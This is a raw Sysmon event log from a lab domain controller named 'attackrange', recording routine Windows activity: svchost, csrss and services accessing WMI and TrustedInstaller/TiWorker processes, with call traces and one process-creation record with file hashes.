10341000x80000000000000001176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.072{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.072{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.072{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.072{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.072{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.072{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.072{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.072{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.072{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.072{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.056{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.056{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.056{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.056{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.056{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.056{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.056{08A6967A-428D-6000-2500-000000009A01}30562200C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-428D-6000-2400-000000009A01}3016C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.056{08A6967A-428D-6000-2500-000000009A01}30562200C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-428D-6000-2400-000000009A01}3016C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.900{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428D-6000-2500-000000009A01}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.900{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-428D-6000-2500-000000009A01}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.900{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428D-6000-2500-000000009A01}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.901{08A6967A-428D-6000-2500-000000009A01}3056C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe10.0.14393.3926 (rs1_release.200817-1737)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=A8CBBA3111CF28435F7E8C8B94EC6FBD,SHA256=D4DDF9F7CB94FE55C7EA1CA90AB9638A883B84308C858EF466554E32FB17EFC3,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-428D-6000-2400-000000009A01}3016C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.822{08A6967A-4286-6000-0A00-000000009A01}8441220C:\Windows\system32\services.exe{08A6967A-428D-6000-2400-000000009A01}3016C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.822{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-428D-6000-2400-000000009A01}3016C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 